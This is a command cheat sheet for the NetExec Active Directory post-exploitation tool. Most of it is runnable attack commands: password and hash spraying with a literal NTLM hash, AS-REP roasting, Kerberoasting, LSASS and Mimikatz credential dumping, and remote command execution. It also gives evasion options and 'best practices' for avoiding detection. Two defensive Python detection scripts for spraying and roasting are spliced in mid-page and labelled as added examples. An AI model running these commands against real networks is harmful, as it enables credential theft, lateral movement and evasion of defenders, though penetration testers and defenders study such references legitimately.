NetExec

NetExec (formerly CrackMapExec) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks by abusing network protocols and performing authentication attacks.

Installation and Setup

| Command | Description |
| --- | --- |
| pip3 install netexec | Install NetExec via pip |
| pipx install netexec | Install with pipx (recommended) |
| git clone https://github.com/Pennyw0rth/NetExec.git | Clone from GitHub |
| cd NetExec && pip3 install . | Install from source |
| netexec --version | Check installed version |
| netexec --help | Display help information |

Basic Usage

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.0/24 | Scan SMB on subnet |
| netexec smb 192.168.1.100 -u username -p password | Authenticate with credentials |
| netexec smb 192.168.1.100 -u username -H ntlmhash | Authenticate with NTLM hash |
| netexec smb 192.168.1.100 -u '' -p '' | Anonymous authentication |
| netexec smb targets.txt -u username -p password | Use target file |

Protocol Support

SMB Protocol

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 | Basic SMB enumeration |
| netexec smb 192.168.1.100 --shares | Enumerate shares |
| netexec smb 192.168.1.100 --users | Enumerate users |
| netexec smb 192.168.1.100 --groups | Enumerate groups |
| netexec smb 192.168.1.100 --local-groups | Enumerate local groups |
| netexec smb 192.168.1.100 --sessions | Enumerate sessions |
| netexec smb 192.168.1.100 --disks | Enumerate disks |

WinRM Protocol

| Command | Description |
| --- | --- |
| netexec winrm 192.168.1.100 -u username -p password | WinRM authentication |
| netexec winrm 192.168.1.100 -u username -p password -x "whoami" | Execute command |
| netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 | Execute PowerShell script |

LDAP Protocol

| Command | Description |
| --- | --- |
| netexec ldap 192.168.1.100 -u username -p password | LDAP authentication |
| netexec ldap 192.168.1.100 -u username -p password --users | Enumerate LDAP users |
| netexec ldap 192.168.1.100 -u username -p password --groups | Enumerate LDAP groups |
| netexec ldap 192.168.1.100 -u username -p password --computers | Enumerate computers |

MSSQL Protocol

| Command | Description |
| --- | --- |
| netexec mssql 192.168.1.100 -u username -p password | MSSQL authentication |
| netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" | Execute SQL query |
| netexec mssql 192.168.1.100 -u username -p password --local-auth | Local authentication |

SSH Protocol

| Command | Description |
| --- | --- |
| netexec ssh 192.168.1.100 -u username -p password | SSH authentication |
| netexec ssh 192.168.1.100 -u username -k id_rsa | SSH key authentication |
| netexec ssh 192.168.1.100 -u username -p password -x "id" | Execute command |

Authentication Methods

Password Authentication

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 -u username -p password | Single credential |
| netexec smb 192.168.1.100 -u users.txt -p passwords.txt | Credential lists |
| netexec smb 192.168.1.100 -u username -p passwords.txt | Password spraying |
| netexec smb 192.168.1.100 -u users.txt -p password | User enumeration |

Hash Authentication

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 -u username -H ntlmhash | NTLM hash |
| netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash | LM:NTLM hash |
| netexec smb 192.168.1.100 -u users.txt -H hashes.txt | Hash lists |

Kerberos Authentication

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 -u username -p password -k | Kerberos authentication |
| netexec smb 192.168.1.100 -u username --use-kcache | Use Kerberos cache |
| netexec smb 192.168.1.100 -u username -p password --kerberos | Force Kerberos |

Enumeration

Share Enumeration

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --shares | List shares |
| netexec smb 192.168.1.100 --shares -u username -p password | Authenticated share listing |
| netexec smb 192.168.1.100 --spider SHARE | Spider share contents |
| netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" | Search for files |

User Enumeration

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --users | Enumerate users |
| netexec smb 192.168.1.100 --rid-brute | RID bruteforce |
| netexec smb 192.168.1.100 --users --rid-brute 1000-2000 | RID range |

Group Enumeration

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --groups | Enumerate groups |
| netexec smb 192.168.1.100 --local-groups | Local groups |
| netexec smb 192.168.1.100 --groups "Domain Admins" | Specific group |

Computer Enumeration

| Command | Description |
| --- | --- |
| netexec ldap 192.168.1.100 --computers | Enumerate computers |
| netexec smb 192.168.1.100 --computers | SMB computer enumeration |

Command Execution

SMB Command Execution

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 -u username -p password -x "whoami" | Execute command |
| netexec smb 192.168.1.100 -u username -p password -X script.ps1 | Execute PowerShell script |
| netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec | Use WMI execution |
| netexec smb 192.168.1.100 -u username -p password --exec-method smbexec | Use SMB execution |

WinRM Command Execution

| Command | Description |
| --- | --- |
| netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" | PowerShell command |
| netexec winrm 192.168.1.100 -u username -p password -X script.ps1 | Execute script |

Modules

Built-in Modules

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 -M spider_plus | Enhanced spidering |
| netexec smb 192.168.1.100 -M enum_avproducts | Enumerate AV products |
| netexec smb 192.168.1.100 -M gpp_password | Group Policy Preferences |
| netexec smb 192.168.1.100 -M lsassy | LSASS dumping |
| netexec smb 192.168.1.100 -M mimikatz | Mimikatz execution |

Module Options

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false | Module options |
| netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true | BloodHound output |

Database

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --users --export users.csv | Export to CSV |
| netexec db | Database management |
| netexec db --workspace default | Set workspace |
| netexec db --clear-database | Clear database |

Advanced Features

Credential Stuffing

| Command | Description |
| --- | --- |
| netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success | Continue on success |
| netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 | Fail limit |

Password Policy

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --pass-pol | Get password policy |
| netexec ldap 192.168.1.100 --pass-pol | LDAP password policy |

BloodHound Integration

| Command | Description |
| --- | --- |
| netexec ldap 192.168.1.100 -u username -p password --bloodhound | Collect BloodHound data |
| netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All | All collections |

ASREPRoast

| Command | Description |
| --- | --- |
| netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt | ASREPRoast attack |
| netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt | Authenticated ASREPRoast |

Kerberoasting

| Command | Description |
| --- | --- |
| netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt | Kerberoasting attack |
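As an added, defensive example (not part of this page or the NetExec project), the script below flags the traces the ASREPRoast and Kerberoasting commands above leave in domain controller Security logs: a 4768 TGT request issued without pre-authentication, and one account requesting RC4 service tickets for many distinct SPNs. The event records, field layout and threshold are constructed assumptions.

```python
# Flag AS-REP roasting and Kerberoasting patterns in Windows Security events
# 4768 (TGT request) and 4769 (service ticket request). Added example, not from
# the NetExec page or project; records are constructed and mimic a minimal
# export: timestamp, event id, account, service name, encryption type, pre-auth type.
from collections import defaultdict

# Constructed sample. RC4 (0x17) is the ticket type roasting tools typically
# request, since RC4-encrypted tickets are the weakest to crack offline.
SAMPLE_EVENTS = """\
2024-05-01T10:00:00,4768,svc_legacy,krbtgt,0x17,0
2024-05-01T10:00:00,4768,alice,krbtgt,0x12,2
2024-05-01T10:01:00,4769,bob,MSSQLSvc/db01,0x17,-
2024-05-01T10:01:00,4769,bob,HTTP/web01,0x17,-
2024-05-01T10:01:01,4769,bob,CIFS/files01,0x17,-
2024-05-01T10:01:01,4769,bob,ldap/dc01,0x17,-
2024-05-01T10:02:00,4769,carol,MSSQLSvc/db01,0x12,-
"""

def parse(text):
    rows = []
    for line in text.splitlines():
        ts, eid, account, service, enc, preauth = line.split(",")
        rows.append({"ts": ts, "id": eid, "account": account.lower(),
                     "service": service, "enc": enc.lower(), "preauth": preauth})
    return rows

def asrep_roastable(rows):
    """4768 with PreAuthType 0: the KDC issued a TGT without pre-authentication,
    so the AS-REP for that account can be captured and cracked offline."""
    return sorted({r["account"] for r in rows
                   if r["id"] == "4768" and r["preauth"] == "0"})

def kerberoast_suspects(rows, min_services=3):
    """Accounts that requested RC4 service tickets for many distinct SPNs in
    one export; a normal session touches a few services, a roasting run
    asks for every SPN it can find."""
    spns = defaultdict(set)
    for r in rows:
        if r["id"] == "4769" and r["enc"] == "0x17":
            spns[r["account"]].add(r["service"])
    return {a: sorted(s) for a, s in spns.items() if len(s) >= min_services}
```

Tune min_services to the environment; service accounts that legitimately fan out to many SPNs belong on an allow-list rather than in the threshold.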

Output and Logging

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --verbose | Verbose output |
| netexec smb 192.168.1.100 --debug | Debug output |
| netexec smb 192.168.1.100 -o output.txt | Save output to file |
| netexec smb 192.168.1.100 --log logs/ | Log directory |

Configuration

Config File (~/.nxc/nxc.conf)

```ini
[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0
```

Protocol-Specific Options

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --port 445 | Custom port |
| netexec smb 192.168.1.100 --timeout 5 | Connection timeout |
| netexec smb 192.168.1.100 --threads 100 | Thread count |

Evasion Techniques

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 --jitter 1-5 | Random delay |
| netexec smb 192.168.1.100 --delay 2 | Fixed delay |
| netexec smb 192.168.1.100 --obfs | Obfuscation |

Common Attack Scenarios

Domain Enumeration

```bash
# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol
```

Credential Attacks

```bash
# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt
```
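Added defensive example (not from this page or the NetExec project): a password spray like the one in the block above shows up on each target as one source IP failing against many accounts a few times each, which is what this script separates from a single user retyping a wrong password. The event records, field layout and thresholds are constructed assumptions.

```python
# Detect the password-spray pattern (one source, many accounts, few tries each)
# in Windows Security event 4625 records. Added example, not from the NetExec
# page or project; the log lines are constructed and mimic a minimal export
# with fields: timestamp, event id, TargetUserName, IpAddress, Status.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a spray from 10.0.0.5 across five accounts, plus a user
# mistyping her own password twice from a workstation.
SAMPLE_LOG = """\
2024-05-01T09:00:01,4625,alice,10.0.0.5,0xC000006D
2024-05-01T09:00:02,4625,bob,10.0.0.5,0xC000006D
2024-05-01T09:00:02,4625,carol,10.0.0.5,0xC000006D
2024-05-01T09:00:03,4625,dave,10.0.0.5,0xC000006D
2024-05-01T09:00:03,4625,erin,10.0.0.5,0xC000006D
2024-05-01T09:05:00,4625,alice,10.0.0.22,0xC000006D
2024-05-01T09:05:09,4625,alice,10.0.0.22,0xC000006D
"""

def parse(log):
    """Return (timestamp, user, source_ip, status) tuples for 4625 events."""
    events = []
    for line in log.splitlines():
        ts, event_id, user, ip, status = line.split(",")
        if event_id == "4625":
            events.append((datetime.fromisoformat(ts), user.lower(), ip, status))
    return events

def detect_spray(events, window=timedelta(minutes=5), min_accounts=5, max_per_account=2):
    """Map source IP -> accounts for sources that failed against at least
    min_accounts distinct accounts inside `window`, each no more than
    max_per_account times (many passwords on one account is brute force,
    a different signature)."""
    by_ip = defaultdict(list)
    for ts, user, ip, _ in sorted(events):
        by_ip[ip].append((ts, user))
    hits = {}
    for ip, attempts in by_ip.items():
        start = 0  # sliding window over this source's attempts, oldest first
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in attempts[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
                hits[ip] = sorted(per_user)
    return hits
```

The --jitter and --delay options listed above stretch the spray over a longer period, so the window should be sized against the domain lockout observation window from --pass-pol rather than seconds.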

Post-Exploitation

```bash
# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# BloodHound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All
```

Integration with Other Tools

Impacket Integration

| Command | Description |
| --- | --- |
| netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec | Use Impacket WMI |
| netexec smb 192.168.1.100 -u username -p password --exec-method smbexec | Use Impacket SMB |

CrackMapExec Migration

| Command | Description |
| --- | --- |
| netexec --convert-cme-db | Convert CME database |
| alias cme='netexec' | Create alias for compatibility |

Troubleshooting

| Command | Description |
| --- | --- |
| netexec --help | General help |
| netexec smb --help | Protocol-specific help |
| netexec -v | Version information |
| netexec --debug smb 192.168.1.100 | Debug mode |

Best Practices

  • Use authentication before enumeration where possible
  • Implement proper delays to avoid detection
  • Use workspaces to organize different engagements
  • Export results for further analysis
  • Combine with other tools for a comprehensive assessment
  • Monitor for defensive responses
  • Use appropriate thread counts to avoid overwhelming targets
  • Implement proper logging
  • Validate credentials before large-scale attacks
  • Use obfuscation techniques when necessary

Security Considerations

  • Use only in authorized networks
  • Implement proper access controls
  • Monitor for detection of security tools
  • Use least privilege
  • Document all activities for compliance
  • Coordinate with the blue team where applicable
  • Perform proper cleanup procedures
  • Store credentials securely
  • Use encrypted communication where possible
  • Update regularly to maintain effectiveness